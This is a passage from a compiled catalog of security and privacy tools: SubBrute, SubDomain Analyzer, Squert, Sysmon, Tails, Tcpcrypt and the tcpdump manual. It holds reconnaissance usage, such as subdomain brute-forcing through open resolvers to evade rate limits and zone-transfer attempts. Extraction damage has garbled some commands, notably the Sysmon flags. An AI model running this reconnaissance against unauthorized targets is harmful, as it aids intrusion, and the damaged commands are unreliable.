your Browser to begin (firefox http://127.0.0.1/
sqlmap/index.php)
DownloadSQLMAP-Web-GUI
SQUERT - A SIMPLE QUERY AND REPORT TOOL
Squert is a web application that is used to query and view event

data stored in a Sguil database (typically IDS alert data).
Squert is a visual tool that attempts to provide additional
context to events through the use of metadata, time series
representations and weighted and logically grouped result sets.
The hope is that these views will prompt questions that
otherwise may not have been asked.
Intro Video:
An error occurred.
Requirements
Sguil 0.9.0 http://sguil.net. If you use Security Onion http://

securityonion.blogspot.ca you can get everything setup
rather quickly.
PHP55 with CLI
mysql
TCL, TclX
mysqltcl
uri
ftp
ftp::geturl
md5
MySQL client
Download Squert
SUBBRUTE - SUBDOMAIN BRUTEFORCER
SubBrute is a community driven project with the goal of
creating the fastest, and most accurate subdomain
enumeration tool. Some of the magic behind SubBrute is that it
uses open resolvers as a kind of proxy to circumvent DNS ratelimiting (https://www.us-cert.gov/ncas/alerts/TA13-088A). This
design also provides a layer of anonymity, as SubBrute does
not send traffic directly to the target's name servers.
Whats new in v1.1?
This version merges pull requests from the community;

changes from JordanMilne, KxCode and rc0r is in this release.
In SubBrute 1.1 we fixed bugs, improved accuracy, and
efficiency. As requested, this project is now GPLv3.
Accuracy and better wildcard detection:
A new filter that can pickup Geolocation aware wildcards.
Filter misbehaving nameservers
Faster:
More than 2,000 high quality nameservers were added to

resolvers.txt, these servers will resolve multiple queries in
under 1 sec.
Nameservers are verified when they are needed. A
seperate thread is responsible creating a feed of
nameservers, and corresponding wildcard blacklist.
New output:
-a will list all addresses associated with a subdomain.
-v debug output, to help developers/hackers debug
subbrute.
-o output results to file.
More Information
The 'names.txt' list was created using some creative Google

hacks with additions from the community. SubBrute has a
feature to build your own subdomain lists by matching subdomains with regular expression and sorting by frequency of
occurrence:
python subroute.py -f full.html > my_subs.txt
names.txt contains 31298 subdomains. subs_small.txt was
stolen from fierce2 which contains 1896 subdomains. If you find
more subdomains to add, open a bug report or pull request and
I'll be happy to add them.
No install required for Windows, just cd into the 'windows'
folder:
subbrute.exe google.com
Easy to install: You just need http://www.dnspython.org/ and
python2.7 or python3. This tool should work under any
operating system: bsd, osx, windows, linux...
(On a side note giving a makefile root always bothers me, it
would be a great way to install a backdoor...)
Under Ubuntu/Debian all you need is:
sudo apt-get install python-dnspython
On other operating systems you may have to install dnspython
manually:
http://www.dnspython.org/
Easy to use:
./subbrute.py google.com
Tests multiple domains:
./subbrute.py google.com gmail.com blogger.com
or a newline delimited list of domains:
./subbrute.py -t list.txt
Also keep in mind that subdomains can have subdomains
(example: _xmpp-server._tcp.gmail.com):
./subbrute.py gmail.com > gmail.out
./subbrute.py -t gmail.out
Download SubBrute
SUBDOMAIN ANALYZER - GET DETAILED INFORMATION
OF A DOMAIN
The "SubDomain Analyzer" tool written in Python language.

The purpose of "SubDomain Analyzer" getting full detailed
information of selected domain. The "SubDomain Analyzer"
gets data from domain by following steps:
1. Trying to get the zone tranfer file.
2. Gathers all information from DNS records.
3. Analyzing the DNS records (Analyzing all IP's addresses

from DNS records and test class C range from IP address
(For example: 127.0.0.1/24) and getting all data that
containing the domain being analyzed).
4. Tests subdomains by dictionary attack.
The Subdomain Analyzer can keep new addresses which found
on DNS records or IP's analyzer. The Subdomain Analyzer can
brings a very qualitative information about the domain being
analyzed, additionally, he shows a designed report with all the
data.
Examples:
Analyzing example.com domain: subdomain-analyzer.py

example.com
Analyzing example.com domain, save the records on log
file by name log.txt, works with 100 threads and use by
another dictionary file by name another-file.txt:
subdomain-analyzer.py example.com --output
log.txt --threads 100 --sub-domain-list anotherfile.txt
Analyzing example.com domain, save the records on log
file by name log.txt and append a new sub-domains to
s u b - d o m a i n s l i s t fi l e : s u b d o m a i n - a n a l y z e r . p y
example.com -o log.txt --sub-domain-list
Requirements:
Linux Installation:
1. sudo apt-get install python-dev python-pip
3. easy_install prettytable
MacOSx Installation:
1. Install Xcode Command Line Tools (AppStore)
2. sudo easy_install pip, prettytable
Windows Installation:
1. Install dnspython
2. Install gevent
3. Install prettytable
4. Open Command Prompt(cmd) as Administrator -> Goto
python folder -> Scripts (cd c:\Python27\Scripts)
5. pip install -r (Full Path To requirements.txt)
6. easy_install prettytable
DownloadSubDomain Analyzer
SUMO - SOFTWARE UPDATE MONITOR
SUMo (Software Update Monitor) keeps your PC up-to-date &

safe by using the most recent version of your favorite
software !
Unlike built-in auto update features, SUMo tells you if updates
are available before you need to use your software.
Features
Automatic detection of installed software

Detects required updates / patchs for your software
Detects required drivers update (requires DUMo)
Filter / authorize Beta versions (user setting)
Ignore list : only tracks software YOU want to track
More compatibility and less false positive than others
Update Monitors (according to users feedback ;-)
Internationalization support.
DownloadSUMo
SYSMON V2.0 - SYSTEM ACTIVITY MONITOR FOR
WINDOWS
System Monitor (Sysmon) is a Windows system service and

device driver that, once installed on a system, remains resident
across system reboots to monitor and log system activity to the
Windows event log. It provides detailed information about
process creations, network connections, and changes to file
creation time. By collecting the events it generates using
Windows Event Collection or SIEM agents and subsequently
analyzing them, you can identify malicious or anomalous
activity and understand how intruders and malware operate on
your network.
Note that Sysmon does not provide analysis of the events it

generates, nor does it attempt to protect or hide itself from
attackers.
Overview of Sysmon Capabilities
Sysmon includes the following capabilities:

Logs process creation with full command line for both
current and parent processes.
Records the hash of process image files using SHA1 (the
default), MD5, SHA256 or IMPHASH.
Multiple hashes can be used at the same time.
Includes a process GUID in process create events to allow
for correlation of events even when Windows reuses
process IDs.
Include a session GUID in each events to allow correlation
of events on same logon session.
Logs loading of drivers or DLLs with their signatures and
hashes.
Optionally logs network connections, including each
connections source process, IP addresses, port numbers,
hostnames and port names.
Detects changes in file creation time to understand when
a file was really created. Modification of file create
timestamps is a technique commonly used by malware to
cover its tracks.
Automatically reload configuration if changed in the
registry.
Rule filtering to include or exclude certain events
dynamically.
Generates events from early in the boot process to
capture activity made by even sophisticated kernel-mode
malware.
Usage
Uses Sysmon simple command-line options to install and

uninstall it, as well as to check and modify Sysmons
configuration:
Sysinternals Sysmon v2.00 - System activity monitor
Copyright (C) 2014-2015 Mark Russinovich and Thomas
Garnier
Sysinternals - www.sysinternals.com
Usage:
Install: Sysmon.exe -i <configfile>
[-h <[sha1|md5|sha256|imphash|*],...>] [-n (<process,...>)]
[-l (<process,...>)]
Configure: Sysmon.exe -c <configfile>
[--|[-h <[sha1|md5|sha256|imphash|*],...>] [-n
(<process,...>)]
[-l (<process,...>)]]
Uninstall: Sysmon.exe -u
c
Update configuration of an installed Sysmon driver or

dump the current configuration if no other argument is
provided. Optionally take a configuration file.
Specify the hash algorithms used for image

identification (default is SHA1). It supports multiple
algorithms at the same time. Configuration entry:
Hashing.
Install service and driver. Optionally take a configuration

file.
Log loading of modules. Optionally take a list of

processes to track. Configuration entry: ImageLoading.
- Install the event manifest (done on service install as

m well).
n
Log network connections. Optionally take a list of

processes to track. Configuration entry: Network.
Uninstall service and driver.
The service logs events immediately and the driver installs as a

boot-start driver to capture activity from early in the boot that
the service will write to the event log when it starts.
On Vista and higher, events are stored in "Applications and
Services Logs/Microsoft/Windows/Sysmon/Operational". On
older systems, events written to the System event log.
If you need more information on configuration files, use the '-?
config' command. More examples are available on the
Sysinternals website.
Specify -accepteula to automatically accept the EULA on
installation, otherwise you will be interactively prompted to
accept it.
Neither install nor uninstall requires a reboot.
Examples
Install with default settings (process images hashed with sha1

and no network monitoring)
sysmon -accepteula i
Install with md5 and sha256 hashing of process created and
monitoring network connections
sysmon -accepteula i h md5,sha256 n
Install Sysmon with a configuration file (as described below)
sysmon accepteula i c:\windows\config.xml
Uninstall
sysmon u
Dump the current configuration
sysmon c
Change the configuration to use all hashes, no network
monitoring and monitoring of DLLs in Lsass
sysmon c h * l lsass.exe
Change the configuration of sysmon with a configuration file (as
described below)
sysmon c c:\windows\config.xml
Change the configuration to default settings
sysmon c --
DownloadSysmon v2.0
TAILS 1.3 - THE AMNESIC INCOGNITO LIVE SYSTEM
Tails is a live operating system, that you can start on almost

any computer from a DVD, USB stick, or SD card. It aims at
preserving your privacy and anonymity, and helps you to:
use the Internet anonymously and circumvent
censorship;
all connections to the Internet are forced to go through the
Tor network;
leave no trace on the computer you are using unless you

ask it explicitly;
use state-of-the-art cryptographic tools to encrypt your
files, emails and instant messaging.
Tails, The Amnesic Incognito Live System, version 1.3, is out.

This release fixes numerous security issues and all users must
upgrade as soon as possible.
New features
Electrum is an easy to use bitcoin wallet. You can use the

Bitcoin Client persistence feature to store your Electrum
configuration and wallet.
The Tor Browser has additional operating system and

data security. This security restricts reads and writes to a
limited number of folders. Learn how to manipulate files
with the new Tor Browser.
The obfs4 pluggable transport is now available to

connect to Tor bridges. Pluggable transports transform the
Tor traffic between the client and the bridge to help
disguise Tor traffic from censors.
Keyringer lets you manage and share secrets using

OpenPGP and Git from the command line.
Upgrades and changes
The Mac and Linux manual installation processes no

longer require the isohybrid command. Removing the
isohybrid command simplifies the installation.
The tap-to-click and two-finger scrolling trackpad
settings are now enabled by default. This should be more
intuitive for Mac users.
The Ibus Vietnamese input method is now supported.
Improved support for OpenPGP smartcards through
the installation of GnuPG 2.
There are numerous other changes that may not be apparent in

the daily operation of a typical user. Technical details of all the
changes are listed in the Changelog.
DownloadTails 1.3

censorship;
Tor network;

ask it explicitly;

New features
Tor Browser 4.5 now has a security slider that you can
use to disable browser features, such as JavaScript, as a
trade-off between security and usability. The security
slider is set to low by default to provide the same level of
security as previous versions and the most usable

experience.
We disabled in Tails the new circuit view of Tor Browser
4.5 for security reasons. You can still use the network map
of Vidalia to inspect your circuits.
Tails OpenPGP Applet now has a shortcut to the gedit

text editor, thanks to Ivan Bliminse.
Paperkey lets you print a backup of your OpenPGP secret

keys on paper.
Upgrades and changes
Tor Browser 4.5 protects better against third-party

tracking. Often when visiting a website, many
connections are created to transfer both the content of the
main website (its page, images, and so on) and third-party
content from other websites (advertisements, Like buttons,
and so on). In Tor Browser 4.5, all such content, from the
main website as well as the third-party websites, goes
through the same Tor circuits. And these circuits are not
reused when visiting a different website. This prevents
third-party websites from correlating your visits to different
websites.
Tor Browser 4.5 now keeps using the same Tor circuit
while you are visiting a website. This prevents the website
from suddenly changing language, behavior, or logging
you out.
Disconnect is the new default search engine.

Disconnect provides Google search results to Tor users
without captchas or bans.
Better support for Vietnamese in LibreOffice through the
installation of fonts-linuxlibertine.
Disable security warnings when connecting to POP3 and

IMAP ports that are mostly used for StartTLS nowadays.
Support for more printers through the installation of

printer-driver-gutenprint.
Upgrade Tor to 0.2.6.7.
Upgrade I2P to 0.9.19 that has several fixes and

improvements for floodfill performance.
Remove the obsolete #i2p-help IRC channel from Pidgin.
Remove the command line email client mutt and msmtp.
There are numerous other changes that might not be apparent

in the daily operation of a typical user. Technical details of all
the changes are listed in the Changelog.
Fixed problems
Make the browser theme of the Windows 8 camouflage

compatible with the Unsafe Browser and the I2P Browser.
Remove the Tor Network Settings... from the Torbutton

menu.
Better support for Chromebook C720-2800 through the

upgrade of syslinux.
Fix the localization of Tails Upgrader.
Fix the OpenPGP key servers configured in Seahorse.
Prevent Tor Browser from crashing when Orca is enabled.
DownloadTails 1.4

censorship;
Tor network;

ask it explicitly;
This release fixes numerous security issues. All users must

upgrade as soon as possible.
NEW FEATURES
You can now start Tails in offline mode to disable all

networking for additional security. Doing so can be useful
when working on sensitive documents.
We added Icedove, a rebranded version of the Mozilla

Thunderbird email client.
Icedove is currently a technology preview. It is safe to use
in the context of Tails but it will be better integrated in
future versions until we remove Claws Mail. Users of
Claws Mail should refer to our instructions to migrate their
data from Claws Mail to Icedove.
UPGRADES AND CHANGES
Improve the wording of the first screen of Tails Installer.
Restart Tor automatically if connecting to the Tor network

takes too long. (#9516)
Update several firmware packages which might improve

hardware compatibility.
Update the Tails signing key which is now valid until 2017.
Update Tor Browser to 5.0.4.
Update Tor to 0.2.7.4.
FIXED PROBLEMS
Prevent wget from leaking the IP address when using the
FTP protocol. (#10364)
Prevent symlink attack on ~/.xsession-errors via tailsdebugging-info which could be used by the amnesia user
to bypass read permissions on any file. (#10333)
Force synchronization of data on the USB stick at the end

of automatic upgrades. This might fix some reliability bugs
in automatic upgrades.
Make the "I2P is ready" notification more reliable.
DownloadTails 1.7
TCPCRYPT - ENCRYPTING THE INTERNET
Tcpcrypt is a protocol that attempts to encrypt (almost) all of

your network traffic. Unlike other security mechanisms,
Tcpcrypt works out of the box: it requires no configuration, no
changes to applications, and your network connections will
continue to work even if the remote end does not support
Tcpcrypt, in which case connections will gracefully fall back to
standard clear-text TCP. Install Tcpcrypt and you'll feel no
difference in your every day user experience, but yet your traffic
will be more secure and you'll have made life much harder for
hackers.
So why is now the right time to turn on encryption? Here are
some reasons:
Intercepting communications today is simpler than
ever because of wireless networks. Ask a hacker how
many e-mail passwords can be intercepted at an airport
by just using a wifi-enabled laptop. This unsophisticated
attack is in reach of many. The times when only a few elite
had the necessary skill to eavesdrop are gone.
Computers have now become fast enough to encrypt
all Internet traffic. New computers come with special
hardware crypto instructions that allow encrypted
networking speeds of 10Gbit/s. How many of us even
achieve those speeds on the Internet or would want to
download (and watch) one movie per second? Clearly, we
can encrypt fast enough.
Research advances and the lessons learnt from over
10 years of experience with the web finally enabled us
to design a protocol that can be used in today's
Internet, by today's users. Our protocol is pragmatic: it
requires no changes to applications, it works with NATs
(i.e., compatible with your DSL router), and will work even
if the other end has not yet upgraded to tcpcryptin which
case it will gracefully fall back to using the old plain-text
TCP. No user configuration is required, making it
accessible to lay usersno more obscure requests like
"Please generate a 2048-bit RSA-3 key and a certificate
request for signing by a CA". Tcpcrypt can be
incrementally deployed today, and with time the whole
Internet will become encrypted.
How Tcpcrypt works
Tcpcrypt is opportunistic encryption. If the other end speaks

Tcpcrypt, then your traffic will be encrypted; otherwise it will be
in clear text. Thus, Tcpcrypt alone provides no guaranteesit
is best effort. If, however, a Tcpcrypt connection is successful
and any attackers that exist are passive, then Tcpcrypt
guarantees privacy.
Network attackers come in two varieties: passive and active
(man-in-the-middle). Passive attacks are much simpler to
execute because they just require listening on the network.
Active attacks are much harder as they require listening and
modifying network traffic, often requiring very precise timing
that can make some attacks impractical.
By default Tcpcrypt is vulnerable to active attacksan attacker
can, for example, modify a server's response to say that
Tcpcrypt is not supported (when in fact it is) so that all
subsequent traffic will be clear text and can thus be
eavesdropped on.
Tcpcrypt, however, is powerful enough to stop active attacks,
too, if the application using it performs authentication. For
example, if you log in to online banking using a password and
the connection is over Tcpcrypt, it is possible to use that shared
secret between you and the bank (i.e., the password) to
authenticate that you are actually speaking to the bank and not
some active (man-in-the-middle) attacker. The attacker cannot
spoof authentication as it lacks the password. Thus, by default,
Tcpcrypt will try its best to protect your traffic. Applications
requiring stricter guarantees can get them by authenticating a
Tcpcrypt session.
How Tcpcrypt is different
Some of us already encrypt some network traffic using SSL

(e.g., HTTPS) or VPNs. Those solutions are inadequate for
ubiquitous encryption. For example, almost all solutions rely on

a PKI to stop man-in-the-middle attacks, which for ubiquitous
deployment would mean that all Internet users would have to
get verified by a CA like Verisign and have to spend money to
buy a certificate. Tcpcrypt abstracts away authentication,
allowing any mechanism to be used, whether PKI, passwords,
or something else.
Next, Tcpcrypt can be incrementally deployed: it has a
mechanism for probing support and can gracefully fall back to
TCP. It also requires no configuration (try that with a VPN!) and
has no NAT issues. Finally, Tcpcrypt has very high
performance (up to 25x faster than SSL), making it feasible for
high volume servers to enable encryption on all connections.
While weaker by default, Tcpcrypt is more realistic for universal
deployment.
We can easily make the bar much higher for attackers, so let's
do it. How much longer are we going to stay clear-text by
default?
DownloadTcpcrypt
TCPDUMP - DUMP TRAFFIC ON A NETWORK
Tcpdump allows you to dump the traffic on a network. It can be

used to print out the headers and/or contents of packets on a
network interface that matches a given expression. You can
use this tool to track down network problems, to detect many
attacks, or to monitor the network activities.

Tcpdump prints out a description of the contents of packets on
a network interface that match the boolean expression; the
description is preceded by a time stamp, printed, by default, as
hours, minutes, seconds, and fractions of a second since
midnight. It can also be run with the -w flag, which causes it to
save the packet data to a file for later analysis, and/or with the r flag, which causes it to read from a saved packet file rather
than to read packets from a network interface. It can also be
run with the -V flag, which causes it to read a list of saved
packet files. In all cases, only packets that match expression
will be processed by tcpdump.
Tcpdump will, if not run with the -c flag, continue capturing
packets until it is interrupted by a SIGINT signal (generated, for
example, by typing your interrupt character, typically control-C)
or a SIGTERM signal (typically generated with the kill(1)
command); if run with the -c flag, it will capture packets until it
is interrupted by a SIGINT or SIGTERM signal or the specified
number of packets have been processed.
When tcpdump finishes capturing packets, it will report counts
of:
packets ``captured'' (this is the number of packets that tcpdump
has received and processed);
packets ``received by filter'' (the meaning of this depends on
the OS on which you're running tcpdump, and possibly on the
way the OS was configured - if a filter was specified on the
command line, on some OSes it counts packets regardless of
whether they were matched by the filter expression and, even if
they were matched by the filter expression, regardless of
whether tcpdump has read and processed them yet, on other
OSes it counts only packets that were matched by the filter
expression regardless of whether tcpdump has read and
processed them yet, and on other OSes it counts only packets
that were matched by the filter expression and were processed
by tcpdump);
packets ``dropped by kernel'' (this is the number of packets that
were dropped, due to a lack of buffer space, by the packet
capture mechanism in the OS on which tcpdump is running, if
the OS reports that information to applications; if not, it will be
reported as 0).
On platforms that support the SIGINFO signal, such as most
BSDs (including Mac OS X) and Digital/Tru64 UNIX, it will
report those counts when it receives a SIGINFO signal
(generated, for example, by typing your ``status'' character,
typically control-T, although on some platforms, such as Mac
OS X, the ``status'' character is not set by default, so you must
set it with stty(1) in order to use it) and will continue capturing
packets. On platforms that do not support the SIGINFO signal,
the same can be achieved by using the SIGUSR1 signal.
Reading packets from a network interface may require that you
have special privileges; see the pcap (3PCAP) man page for
details. Reading a saved packet file doesn't require special
privileges.
OPTIONS
-A
Print each packet (minus its link level header) in ASCII. Handy
for capturing web pages.
-b
Print the AS number in BGP packets in ASDOT notation rather
than ASPLAIN notation.
-B buffer_size
--buffer-size=buffer_size
Set the operating system capture buffer size to buffer_size, in
units of KiB (1024 bytes).
-c count
Exit after receiving count packets.
-C file_size
Before writing a raw packet to a savefile, check whether the file
is currently larger than file_size and, if so, close the current
savefile and open a new one. Savefiles after the first savefile
will have the name specified with the -w flag, with a number
after it, starting at 1 and continuing upward. The units of
file_sizeare millions of bytes (1,000,000 bytes, not 1,048,576
bytes).
-d
Dump the compiled packet-matching code in a human readable
form to standard output and stop.
-dd
Dump packet-matching code as a C program fragment.
-ddd
Dump packet-matching code as decimal numbers (preceded
with a count).
-D
--list-interfaces
Print the list of the network interfaces available on the system
and on which tcpdump can capture packets. For each network
interface, a number and an interface name, possibly followed
by a text description of the interface, is printed. The interface
name or the number can be supplied to the -i flag to specify an
interface on which to capture.
This can be useful on systems that don't have a command to
list them (e.g., Windows systems, or UNIX systems lacking
ifconfig -a); the number can be useful on Windows 2000 and
later systems, where the interface name is a somewhat
complex string.
The -D flag will not be supported if tcpdump was built with an
older version of libpcap that lacks the pcap_findalldevs()
function.
-e
Print the link-level header on each dump line. This can be used,
for example, to print MAC layer addresses for protocols such as
Ethernet and IEEE 802.11.
-E
Use spi@ipaddr algo:secret for decrypting IPsec ESP packets
that are addressed to addr and contain Security Parameter
Index value spi. This combination may be repeated with comma
or newline separation.
Note that setting the secret for IPv4 ESP packets is supported
at this time.
Algorithms may be des-cbc, 3des-cbc, blowfish-cbc, rc3cbc, cast128-cbc, or none. The default is des-cbc. The ability
to decrypt packets is only present if tcpdump was compiled with
cryptography enabled.
secret is the ASCII text for ESP secret key. If preceded by 0x,
then a hex value will be read.
The option assumes RFC2406 ESP, not RFC1827 ESP. The
option is only for debugging purposes, and the use of this
option with a true `secret' key is discouraged. By presenting
IPsec secret key onto command line you make it visible to
others, via ps(1) and other occasions.
In addition to the above syntax, the syntax file name may be
used to have tcpdump read the provided file in. The file is
opened upon receiving the first ESP packet, so any special
permissions that tcpdump may have been given should already
have been given up.
-f
Print `foreign' IPv4 addresses numerically rather than
symbolically (this option is intended to get around serious brain
damage in Sun's NIS server --- usually it hangs forever
translating non-local internet numbers).
The test for `foreign' IPv4 addresses is done using the IPv4
address and netmask of the interface on which capture is being
done. If that address or netmask are not available, available,
either because the interface on which capture is being done
has no address or netmask or because the capture is being
done on the Linux "any" interface, which can capture on more
than one interface, this option will not work correctly.
-F file
Use file as input for the filter expression. An additional
expression given on the command line is ignored.
-G rotate_seconds
If specified, rotates the dump file specified with the -w option
every rotate_seconds seconds. Savefiles will have the name
specified by -w which should include a time format as defined
by strftime(3). If no time format is specified, each new file will
overwrite the previous.
If used in conjunction with the -C option, filenames will take the
form of `file<count>'.
-h
--help
Print the tcpdump and libpcap version strings, print a usage
message, and exit.
--version
Print the tcpdump and libpcap version strings and exit.
-H
Attempt to detect 802.11s draft mesh headers.
-i interface
--interface=interface
Listen on interface. If unspecified, tcpdump searches the
system interface list for the lowest numbered, configured up
interface (excluding loopback), which may turn out to be, for
example, `èth0''.
On Linux systems with 2.2 or later kernels, an interface

argument of `àny'' can be used to capture packets from all
interfaces. Note that captures on the `àny'' device will not be
done in promiscuous mode.
If the -D flag is supported, an interface number as printed by
that flag can be used as the interface argument.
-I
--monitor-mode
Put the interface in "monitor mode"; this is supported only on
IEEE 802.11 Wi-Fi interfaces, and supported only on some
operating systems.
Note that in monitor mode the adapter might disassociate from
the network with which it's associated, so that you will not be
able to use any wireless networks with that adapter. This could
prevent accessing files on a network server, or resolving host
names or network addresses, if you are capturing in monitor
mode and are not connected to another network with another
adapter.
This flag will affect the output of the -L flag. If -I isn't specified,
only those link-layer types available when not in monitor mode
will be shown; if -I is specified, only those link-layer types
available when in monitor mode will be shown.
--immediate-mode
Capture in "immediate mode". In this mode, packets are
delivered to tcpdump as soon as they arrive, rather than being
buffered for efficiency. This is the default when printing packets
rather than saving packets to a ``savefile'' if the packets are
being printed to a terminal rather than to a file or pipe.
-j tstamp_type
--time-stamp-type=tstamp_type
Set the time stamp type for the capture to tstamp_type. The
names to use for the time stamp types are given in pcaptstamp(7); not all the types listed there will necessarily be valid
for any given interface.
-J
--list-time-stamp-types
List the supported time stamp types for the interface and exit. If
the time stamp type cannot be set for the interface, no time
stamp types are listed.
--time-stamp-precision=tstamp_precision
When capturing, set the time stamp precision for the capture to
tstamp_precision. Note that availability of high precision time
stamps (nanoseconds) and their actual accuracy is platform
and hardware dependent. Also note that when writing captures
made with nanosecond accuracy to a savefile, the time stamps
are written with nanosecond resolution, and the file is written
with a different magic number, to indicate that the time stamps
are in seconds and nanoseconds; not all programs that read
pcap savefiles will be able to read those captures.
When reading a savefile, convert time stamps to the precision
specified by timestamp_precision, and display them with that
resolution. If the precision specified is less than the precision of
time stamps in the file, the conversion will lose precision.
The supported values for timestamp_precision are micro for
microsecond resolution and nano for nanosecond resolution.
The default is microsecond resolution.
-K
--dont-verify-checksums
Don't attempt to verify IP, TCP, or UDP checksums. This is
useful for interfaces that perform some or all of those checksum
calculation in hardware; otherwise, all outgoing TCP
checksums will be flagged as bad.
-l
Make stdout line buffered. Useful if you want to see the data
while capturing it. E.g.,
tcpdump -l | tee dat

or
tcpdump -l > dat & tail -f dat

Note that on Windows,``line buffered'' means `ùnbuffered'', so
that WinDump will write each character individually if -l is
specified.
-U is similar to -l in its behavior, but it will cause output to be
``packet-buffered'', so that the output is written to stdout at the
end of each packet rather than at the end of each line; this is
buffered on all platforms, including Windows.
-L
--list-data-link-types
List the known data link types for the interface, in the specified
mode, and exit. The list of known data link types may be
dependent on the specified mode; for example, on some
platforms, a Wi-Fi interface might support one set of data link
types when not in monitor mode (for example, it might support
only fake Ethernet headers, or might support 802.11 headers
but not support 802.11 headers with radio information) and
another set of data link types when in monitor mode (for
example, it might support 802.11 headers, or 802.11 headers
with radio information, only in monitor mode).
-m module
Load SMI MIB module definitions from file module. This option
can be used several times to load several MIB modules into
tcpdump.
-M secret
Use secret as a shared secret for validating the digests found in
TCP segments with the TCP-MD5 option (RFC 2385), if
present.
-n
Don't convert addresses (i.e., host addresses, port numbers,
etc.) to names.
-N
Don't print domain name qualification of host names. E.g., if
you give this flag then tcpdump will print ``nic'' instead of
``nic.ddn.mil''.
-#
--number
Print an optional packet number at the beginning of the line.
-O
--no-optimize
Do not run the packet-matching code optimizer. This is useful
only if you suspect a bug in the optimizer.
-p
--no-promiscuous-mode
Don't put the interface into promiscuous mode. Note that the
interface might be in promiscuous mode for some other reason;
hence, `-p' cannot be used as an abbreviation for èther host
{local-hw-addr} or ether broadcast'.
-Q direction
--direction=direction
Choose send/receive direction direction for which packets
should be captured. Possible values are ìn', òut' and ìnout'.
Not available on all platforms.
-q
Quick (quiet?) output. Print less protocol information so output
lines are shorter.

-R
Assume ESP/AH packets to be based on old specification
(RFC1825 to RFC1829). If specified, tcpdump will not print
replay prevention field. Since there is no protocol version field
in ESP/AH specification, tcpdump cannot deduce the version of
ESP/AH protocol.
-r file
Read packets from file (which was created with the -w option or
by other tools that write pcap or pcap-ng files). Standard input
is used if file is ``-''.
-S
--absolute-tcp-sequence-numbers
Print absolute, rather than relative, TCP sequence numbers.
-s snaplen
--snapshot-length=snaplen
Snarf snaplen bytes of data from each packet rather than the
default of 65535 bytes. Packets truncated because of a limited
snapshot are indicated in the output with ``[|proto]'', where proto
is the name of the protocol level at which the truncation has
occurred. Note that taking larger snapshots both increases the
amount of time it takes to process packets and, effectively,
decreases the amount of packet buffering. This may cause
packets to be lost. You should limit snaplen to the smallest
number that will capture the protocol information you're
interested in. Setting snaplen to 0 sets it to the default of
65535, for backwards compatibility with recent older versions of
tcpdump.
-T type
Force packets selected by "expression" to be interpreted the
specified type. Currently known types are aodv (Ad-hoc Ondemand Distance Vector protocol),carp (Common Address
Redundancy Protocol), cnfp (Cisco NetFlow protocol), lmp
(Link Management Protocol), pgm (Pragmatic General
Multicast),pgm_zmtp1 (ZMTP/1.0 inside PGM/EPGM), radius

(RADIUS), rpc (Remote Procedure Call), rtp (Real-Time
Applications protocol), rtcp (Real-Time Applications control
protocol), snmp (Simple Network Management Protocol), tftp
(Trivial File Transfer Protocol), vat (Visual Audio Tool), wb
(distributed White Board),zmtp1 (ZeroMQ Message Transport
Protocol 1.0) and vxlan (Virtual eXtensible Local Area
Network).
Note that the pgm type above affects UDP interpretation only,
the native PGM is always recognised as IP protocol 113
regardless. UDP-encapsulated PGM is often called "EPGM" or
"PGM/UDP".
Note that the pgm_zmtp1 type above affects interpretation of
both native PGM and UDP at once. During the native PGM
decoding the application data of an ODATA/RDATA packet
would be decoded as a ZeroMQ datagram with ZMTP/1.0
frames. During the UDP decoding in addition to that any UDP
packet would be treated as an encapsulated PGM packet.
-t
Don't print a timestamp on each dump line.
-tt
Print the timestamp, as seconds since January 1, 1970,
00:00:00, UTC, and fractions of a second since that time, on
each dump line.
-ttt
Print a delta (micro-second resolution) between current and
previous line on each dump line.
-tttt
Print a timestamp, as hours, minutes, seconds, and fractions of
a second since midnight, preceded by the date, on each dump
line.
-ttttt
Print a delta (micro-second resolution) between current and first
line on each dump line.
-u
Print undecoded NFS handles.
-U
--packet-buffered
If the -w option is not specified, make the printed packet output
``packet-buffered''; i.e., as the description of the contents of
each packet is printed, it will be written to the standard output,
rather than, when not writing to a terminal, being written only
when the output buffer fills.
If the -w option is specified, make the saved raw packet output
``packet-buffered''; i.e., as each packet is saved, it will be
written to the output file, rather than being written only when the
output buffer fills.
The -U flag will not be supported if tcpdump was built with an
older version of libpcap that lacks the pcap_dump_flush()
function.
-v
When parsing and printing, produce (slightly more) verbose
output. For example, the time to live, identification, total length
and options in an IP packet are printed. Also enables additional
packet integrity checks such as verifying the IP and ICMP
header checksum.
When writing to a file with the -w option, report, every 10
seconds, the number of packets captured.
-vv
Even more verbose output. For example, additional fields are
printed from NFS reply packets, and SMB packets are fully
decoded.
-vvv
Even more verbose output. For example, telnet SB ... SE
options are printed in full. With -X Telnet options are printed in
hex as well.
-V file
Read a list of filenames from file. Standard input is used if file is
``-''.
-w file
Write the raw packets to file rather than parsing and printing
them out. They can later be printed with the -r option. Standard
output is used if file is ``-''.
This output will be buffered if written to a file or pipe, so a
program reading from the file or pipe may not see packets for
an arbitrary amount of time after they are received. Use the -U
flag to cause packets to be written as soon as they are
received.
The MIME type application/vnd.tcpdump.pcap has been
registered with IANA for pcap files. The filename
extension .pcap appears to be the most commonly used along
with .cap and .dmp. Tcpdump itself doesn't check the extension
when reading capture files and doesn't add an extension when
writing them (it uses magic numbers in the file header instead).
However, many operating systems and applications will use the
extension if it is present and adding one (e.g. .pcap) is
recommended.
See pcap-savefile(5) for a description of the file format.
-W
Used in conjunction with the -C option, this will limit the number
of files created to the specified number, and begin overwriting
files from the beginning, thus creating a 'rotating' buffer. In
addition, it will name the files with enough leading 0s to support
the maximum number of files, allowing them to sort correctly.
Used in conjunction with the -G option, this will limit the number
of rotated dump files that get created, exiting with status 0
when reaching the limit. If used with -C as well, the behavior
will result in cyclical files per timeslice.
-x
When parsing and printing, in addition to printing the headers of
each packet, print the data of each packet (minus its link level
header) in hex. The smaller of the entire packet or snaplen
bytes will be printed. Note that this is the entire link-layer
packet, so for link layers that pad (e.g. Ethernet), the padding
bytes will also be printed when the higher layer packet is
shorter than the required padding.
-xx
each packet, print the data of each packet, including its link
level header, in hex.
-X
each packet, print the data of each packet (minus its link level
header) in hex and ASCII. This is very handy for analysing new
protocols.
-XX
each packet, print the data of each packet, including its link
level header, in hex and ASCII.
-y datalinktype
--linktype=datalinktype
Set the data link type to use while capturing packets to
datalinktype.
-z postrotate-command
Used in conjunction with the -C or -G options, this will make
tcpdump run " postrotate-command file " where file is the
savefile being closed after each rotation. For example,
specifying -z gzip or -z bzip2 will compress each savefile using
gzip or bzip2.
Note that tcpdump will run the command in parallel to the
capture, using the lowest priority so that this doesn't disturb the
capture process.
And in case you would like to use a command that itself takes
flags or different arguments, you can always write a shell script
that will take the savefile name as the only argument, make the
